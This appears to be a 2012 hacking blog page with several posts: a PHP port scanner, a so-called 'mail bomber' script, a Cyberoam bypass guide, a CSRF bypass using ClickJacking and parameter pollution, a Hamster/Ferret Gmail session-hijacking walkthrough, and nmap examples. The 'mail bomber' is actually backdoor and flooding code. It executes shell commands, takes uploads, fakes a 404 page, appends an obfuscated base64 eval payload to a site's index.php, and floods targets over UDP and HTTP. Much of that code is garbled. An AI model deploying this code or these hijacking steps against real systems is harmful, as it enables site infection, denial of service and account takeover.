Monday, 30 January 2012

PHP Vulnerability Hunter

PHP Vulnerability Hunter
PHP Vulnerability Hunter is a PHP fuzzing tool that scans for several different vulnerabilities by performing dynamic program analysis. It can detect arbitrary command execution, local file inclusion, arbitrary upload, and several other types of vulnerabilities.
Changes: Added tooltips to GUI, input map report, automatic error reporting, port setting, static analysis phase, and a ton more. Minor CLI tweaks. Code annotation improvements and updated help menu shortcut.

PHP Simple port scanner

Range : 1-1000
you can control it from this line

for($i=[1];$i<=[1000];$i++) {

How script worked ?
upload it to somewhere and type on URL bar this [Someone's ip] 
then click enter and you must wait to scann
then script show you whos port is opened.
$ip = $_GET['ip'];
if(isset($ip)) {
for($i=1;$i<=1000;$i++) {
    $conn = @fsockopen($ip, $i);
    if ($conn) {
        echo "Port $i is open on $ip. <br />";

PHP Mail Bomber Script

PHP mail bomber script available here:  



PHP Code:

<?php error_reporting(0); $base dirname(__FILE__)."/";
stoped() {cmdexec("killall -9 perl;
killall -9 perl-bin;
killall -9 perl-cgi;
); unlink($base."start.php"); unlink($base.""); unlink($base.""); unlink($base."startphp.php");
"<stopcleandos>Stop & Clean</stopcleandos>"apache_child_terminate();
UploadFile($File){cmdexec("killall -9 perl"); cmdexec("killall -9 perl-bin"); cmdexec("killall -9 perl-cgi"); $target_path ="./"$target_path $target_path basename$File['name']);
move_uploaded_file($File['tmp_name'], $target_path);
curPageURL(){$pageURL 'http';
if (
$_SERVER["HTTPS"] == "on") {$pageURL .= "s";
$pageURL .= "://";
if (
} else {
DNullRequest() {@ob_start();
"<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
}if (
$_GET['action']=="status") {print "itsoknoproblembro";
}if (
$_GET['action']=="start.php") {cmdexec("ps | grep -r perl");
}if (
$_GET['action']=="startphp.php") {cmdexec("ps | grep -r php");
}if (
$_GET['action']=="infection") {$up "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mfJwd/8B')));
$index =$_SERVER['DOCUMENT_ROOT']."/index.php";
if (
file_exists($index)) {$fp = @fopen($index'a+');
fclose($fp); $content file_get_contents($index);
if (
eregi("RSqMi6uu",$content)) {print "<infectdos>Infected</infectdos>";
"<infectdos>Not Infected</infectdos>";
"<infectdos>N E I</infectdos>";}}switch($_POST['action']){case "upload":UploadFile($_FILES['file']);
"ust":$page curPageURL(); $ip $_POST['ip']; $port "11"$out $page."\n"$socket stream_socket_client("udp://$ip:$port");
if (
$socket) {stream_set_write_buffer($socket0); stream_socket_sendto($socket,$out);
"ab":$url $_POST['url']; $c $_POST['c']; $n $_POST['n']; cmdexec("ab -c $c -n $n $url");

Sunday, 15 January 2012

how to hack cyberoam

these trick is presented by LOKESH SINGH 
Stepwise Description:
1. First of all We need to get the Footprint IP . Simple Method to Get Footprint IP.
2. Open Your Mozilla Firefox Web Browser And type the Following Site.
3. When you Open the Site you will see something like this:

Click On I understand the risk (THIS IS TO ACCEPT SSL CERTIFICATE)
 Click on Add Exception

4. Now Guys We have Got the Footprint IP.
Next thing is that We Neeed PORT for Accessing It.
USE PORT 3128 as Its open by default on system which have aceess to Internet.
6. Its a Portable version of Proxifier . So need Not To Install. Just Click on It And Extract Anywhere you want. I prefer In Pen Drive.
 7. After that You will Get Some Files LIKE THIS and CLICK ON PROXIFER TO RUN IT.

8. Now see the Task Bar. You will See something Like This. Clcik on that.

11. Now do the Settings as Shown Below. and Click Ok.


How to access the blocked website ?

Down load UltraVPN is client/server SSL VPN solution base on open encrypt and anonymous your network connection

Who's using UltraVPN ?
it's use an environment where, for some reason,access to internet is restricted .
It can be use by any individual who simply want to protect his privacy, either on a LAN or public hotspot.

How can I use UltraVPN ?
download software client and create a (username,password).you are able to connect to the VPN   

What can you with UltraVPN ?
  • access the block website from within corporate environment .
  • use any software like Skype,msn if its blocked.
  • protect your email and browsing privacy .

Thursday, 12 January 2012

Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution

This idea occurred to me a few weeks back when discussing the potential impact of ClickJacking attacks with Luca. Submitting forms using ClickJacking is hard work and is only successful in very rare scenarios. The Twitter ClickJacking attack was one famous instance where form submission was involved, but it was a form that was submitted over ‘GET’ request.

In this post I will discuss a technique that can be used to bypassing any CSRF counter measures and submit POST method -based forms with attacker controlled data using ClickJacking. This works on JSP applications and partially on ASP.NET applications.

Let us take the case of a simple primary Email ID update form. Such forms are common in many web applications. They are simple but extremely important, if an attacker manages to force a victim to update his primary Email ID with that of the attacker’s ID then the attacker can perform a password reset and compromise the victim’s account.

A sample Email ID update form is given below, this contains a ‘csrf-token’ parameter for CSRF protection:
<form method="POST">
<input type="text" name="email" value=””></input>
<input type="hidden" name=”csrf-token” value="a0a0a0a0a0a"/>

Let’s say this form is available at ''
Since this form does not contain an ‘action’ attribute, on submission the form will be submitted to the current URL in the address bar, which will be ‘’.

The source code of 'updateEmail.jsp' would typically look like this:
if ( request.parameter("email").isSet() && request.parameter("csrf-token").isValid() )
//process the form and update the email ID
//display an empty form to the user (CSRF token included)

The application checks if the request contains a valid CSRF token, if not it displays the form to the user.

Now to submit our sample form using ClickJacking the attacker can include an iframe like this
'<iframe src=””>'

When this request goes to the server the application would display the update form. When this form is submitted by the victim using ClickJacking the request that is sent to the server is like this:
POST /updateEmail.jsp? HTTP/1.1


Since the form was not filled by the victim, the email parameter in the POST body is blank. However since the action attribute of the form was empty the form is submitted to Now the QueryString contains the attacker entered value for the ‘email’ parameter.

This request contains two values for the ‘email’ parameter, one in POST body and one in QueryString. Enter HTTP Parameter Pollution, when the server side JSP code calls request.parameter("email"), the value that is returned is the one in the QueryString and not the POST body. Since this value can be controlled by the attacker he can trick the victim in to updating his account with the attacker’s mail ID.

This attack can also work in cases when the form is submitted with JavaScript like this:
<form onSubmit=process()>
<input type="text" name="email" value=""></input>
<input type="hidden" name="csrf-token" value="a0a0a0a0a0a">

function process()
//check if email is set
form.action = document.location; //document.location will give out the entire URL with parameters
form.method = "post";

Apart from JSP applications, this attack can be extended to ASP.NET applications as well.
However since ASP.NET appends a ‘,’(comma) between duplicate parameters, it not as clean. But there are plenty of areas where having a trailing ‘,’ won’t hurt. In ASP.NET applications the form action is always set by the framework because of the 'runat="server"' attribute. The only requirement now is that the application should make use of Request.Params. Even if the application does not use Request.Params, forms submitted over 'GET' are still vulnerable. So all ASP.NET application using Request.Params or submitting forms over 'GET' are vulnerable to this attack!

Similar attack is also possible on ASP applications where the form element is of the form described earlier and if it is submitted over 'GET'. Like ASP.NET application a trailing comma is introduced here as well. A more detailed description of HTTP Parameter Pollution on ASP and ASP.NET applications and the significance of Request.Params is explained here. This whitepaper discusses how HPP can be used to bypass WAF.

Tuesday, 10 January 2012

man-in-the-middle attacks


 As we have demonstrated with those examples, MITM attacks are incredibly effective and increasingly hard to detect. In the third part of this article we will examine session hijacking, which is no different. As with the previous two articles I will describe the theory behind session hijacking, demonstrate the technique in practice, and discuss detection and prevention tips.

Session Hijacking

The term session hijacking is thrown around frequently and encompasses a variety of different attacks. In general, any attack that involves the exploitation of a session between devices is session hijacking. When we refer to a session, we are talking about a connection between devices in which there is state. That is, there is an established dialogue in which a connection has been formally set up, the connection is maintained, and a defined process must be used to terminate the connection. When we talk about sessions theoretically it’s a bit confusing, so it may help to think of a session in a more practical sense.
In this article we will be talking about session hijacking through cookie stealing, which involves HTTP sessions. If you think about some of the common websites you visit that require login credentials, those are great examples of session-oriented connections. You must be authenticated by the website with your username and password to formally set up the session, the website maintains some form of session tracking to ensure you are still logged in and are allowed to access resources (often done with a cookie), and when the session is ending the credentials are cleared and the session ends. This is a very specific example of a session and even though we do not always realize it, sessions are occurring constantly and most communications rely on some form of session or state-based activity.

  Figure 1: A normal session

As we have seen in previous attacks, nothing that goes across the network is safe and session data is no different. The principle behind most forms of session hijacking is that if you can intercept certain portions of the session establishment, you can use that data to impersonate one of the parties involved in the communication so that you may access session information. In the case of our earlier example, this means that if we were to capture the cookie that is used to maintain the session state between your browser and the website you are logging into, we could present that cookie to the web server and impersonate your connection. If that sounds too good to be true from an attackers standpoint, well….it is.


Figure 2: Session Hijacking

Now that we have a little bit of theory in the books, let us delve into a practical example.

Stealing Cookies with Hamster and Ferret

In our practical scenario we will be performing a session hijacking attack by intercepting the communication of a user logging into his Gmail account. Using this intercepted communication we will impersonate that user and access the account from our attacking machine.
In order to perform this attack we will be using two tools straight out of the pet store, named Hamster and Ferret. Both tools can be downloaded from here. These are both command-line tools so the hamster folder can be extracted to an easy to get to location.
Alternatively, you can download and use Backtrack 4. BT4 is a Linux live-CD distribution designed specifically for hacking and penetration testing that comes with a myriad of preinstalled and precompiled tools, with Hamster/Ferret being two of them. You can download BT4 from here. You will then find Hamster in the /pentest/sniffers/hamster folder. The screenshot examples used in the rest of this tutorial are taken from BT4.
The first step involved in this form of session hijacking is to capture the traffic of the victim user as he browses Facebook. This traffic can actually be captured using any packet sniffing application such as TCPDump or Wireshark, but in order to capture the right packets you will need to employ a technique such as ARP cache poisoning (discussed in the first article in this series). 

Figure 3: Capturing traffic of the user browsing to Gmail

Once you have captured the traffic of the victim user browsing to Gmail you will need to save the captured file into the Hamster directory. For the purposes of this example, we have named our file victim_gmail.pcap. When that file is in place, we will use Ferret to process the file. This is done by browsing to the Hamster folder and running the command, ferret –r victim_gmail.pcap. Ferret will process the file and create a hamster.txt file that may be used by Hamster for the actual hijacking of the session.
Figure 4: Processing the capture file with Ferre

With our HTTP data intercepted and prepared for use, we can use Hamster to actually execute the attack. Hamster itself actually runs as a proxy that provides an interface for browsing and using stolen session cookies. In order to start the Hamster proxy you can simply execute Hamster with no command line options.

 Figure 5: Starting Hamster

Once executed, you will need to open your browser and configure its proxy settings to match those provided to you by the Hamster output. By default, this means that you would configure your proxy settings to use the local loop-back address on port 1234. You can access these settings in Internet Explorer by selecting Tools, Internet Options, Connections, LAN Settings, and placing a check box in the Use a proxy server for your LAN box.

 Figure 6: Configuring proxy settings for use with Hamster

Now that the proxy settings have been applied you can access the Hamster console in your browser by browsing to http://hamster. Hamster will use the file created by Ferret to produce a list of IP addresses for whom session information has be intercepted and display those IP address in the right pane of the browser. Our file we’ve created only contains a single IP address of the victim, so if we click that the left pane will be populated with the sessions available for hijacking.

 Figure 7: The Hamster GUI

We see that is listed, and if you click that link you will be pleased to be presented with a new window that has you logged in to the victims Gmail account!

   Figure 8: Successfully hijacked Gmail account!

Defending Against Session Hijacking

There are many different forms of session hijacking so the defenses for them can vary. Just like the other MITM attacks we’ve evaluated, session hijacking is difficult to detect and even more difficult to defend against because it’s a mostly passive attack. Unless the malicious user performs some type of obvious action when he accesses the session being hijacked, you may never know that they were there. Here are a few things you can do to better defend against session hijacking:

  • Save Online Banking for Home - The chance of somebody intercepting your traffic on your home network is much less than on your work network. This isn’t because your home computer is more secure (let’s face it, its probably less secure), but the simple matter of fact is that if you only have one or two computers at home, the most you have to worry about in terms of session hijacking is if your 14 year old son starts watching hacking videos on YouTube. On a corporate network you don’t know what is going on down the hall or in the branch office 200 miles away, so the potential attack sources multiply. One of the biggest targets for session hijacking is online banking, but this principal applies to anything.
  • Be Cognizant - Smart attackers will not leave any evidence that they have been in one of your secure accounts but even the most seasoned hackers make mistakes. Being aware when you are logged into session-based services can help you determine if somebody else is walking in your shadow. Keep an eye out for things that seem out of place, and pay attention to “Last Logon Time” fields to ensure everything matches up.
  • Secure your internal machines - Once again, attacks like these are most commonly executed from inside the network. If your network devices are secure then there is less of a chance of those compromised hosts being used to launch a session hijacking attack

Saturday, 7 January 2012

Advance hacking with NMAP

The point of port scanning a server is to detect its open ports the port’s listening services. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. The Nmap Security Scanner is available for both Mac and Windows users: .

Host Discovery
[bryan@nereid bryan] sudo nmap -n -sP

Host appears to be up.
MAC Address: 00:0C:F1:D2:29:4C (Intel)
Host appears to be up.
MAC Address: 00:0B:DB:27:40:47 (Dell ESG Pcba Test)
Nmap finished: 20 IP addresses (2 hosts up) scanned in 0.646 seconds

Port Scanning
bryan@firemaw:~$ sudo nmap

Interesting ports on
(The 1667 ports scanned but not shown below are in state: filtered)
21/tcp      open      ftp
22/tcp      open      ssh
80/tcp      open      http
427/tcp     closed  svrloc
443/tcp     closed  https
3689/tcp   open    rendezvous
8080/tcp   open    http-proxy

Application Fingerprinting
bryan@firemaw:~$ sudo nmap -n -sV

Interesting ports on
(The 1667 ports scanned but not shown below are in state: filtered)
21/tcp open           ftp                  tnftpd 20040810
22/tcp open s        sh                  OpenSSH 3.8.1p1 (protocol 1.99)
80/tcp open          http                 Apache httpd 1.3.33 ((Darwin) PHP/4.4.1)
427/tcp closed      svrloc
443/tcp closed      https
3689/tcp open      rendezvous     Apple iTunes 6.0.4 (on Mac OS X)
8080/tcp open     http-proxy?

Advance hacking with NMAP available (
Advance hacking with NMAP Scripts